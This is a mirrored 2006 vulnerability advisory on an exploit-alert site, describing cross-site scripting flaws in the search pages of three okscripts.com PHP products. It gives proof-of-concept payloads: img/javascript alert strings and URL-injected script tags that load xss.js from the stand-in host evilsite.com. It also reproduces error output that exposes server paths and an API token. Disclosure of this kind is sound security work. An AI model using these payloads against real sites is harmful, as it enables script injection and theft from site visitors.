Advertisement






okscripts.com - XSS Vulns

CVE Category Price Severity
N/A CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') N/A Medium
Author Risk Exploitation Type Date
Unknown Medium Remote 2006-06-18
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006060085

Below is a copy:

OkMall v1.0

Homepage:

http://www.okscripts.com/

Effected files:

search.php

XSS Vulnerabilities:

The search inputbox doesn?t properally filter using input before generating it.  Backslashes areadded but we can easily

evade this.

ForPoC try putting a [imgsrc=lol.jpg]in the search box.

XSS vuln via URLinjection with possible buffer overflow?:

http://www.example.com/okmall/demo/search.php?q=a%20%20b%20e%20&mcdir=5&
page=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]

The above PoC creates the error msg:

Warning: fopen(http://xml.amazon.com/onca/xml3?locale=us&t=boxxnetcom-20&dev-t=06
464ERBRYHMP1RY3W82&KeywordSearch=a__b_e_&sort=+pmrank&offer=All&mode=cla
ssical&type=lite&page=This is remote text via xss.jslocated at evilsite.com&f=xml): failed to open stream: HTTP request failed! HTTP/1.1 500 Server Error in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 59

Warning: feof(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 60

Warning: fread(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 61

and continuously outputs feof() and fread() error messages on the page. Buffer overflow?

------------------------

QuickLinks v1.1

Homepage:

http://www.okscripts.com/

Effected files:

cat.php

XSS Vulnerabilities:

The search inputbox doesn?t properally filter using input before generating it. Backslashes areadded but we can easilyevade this. ForPoC try putting [IMG SRC=javascript:alert(?XSS?)] in the search box.

XSS vuln via URL injection:

http://www.example.com/quicklinks/demo/search.php?q=[SCRIPT%20SRC=http:/
/evilsite.com/xss.js][/SCRIPT]

--------------------------------------

OKArticles v1.0

Homepage:

http://www.okscripts.com/

Effected files:

search.php

XSS Vulnerabilities:

The search inputbox doesn?t properally filter using input before generating it.  Backslashes areadded but we can easilyevade this. For PoC try putting [IMG SRC=javascript:alert(?XSS?)] in the search box.

XSS vuln via URL  injection:

http://www.example.com/okarticles/demo/search.php?q=[SCRIPT%20SRC=http:/
/evilsite.com/xss.js][/SCRIPT]

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum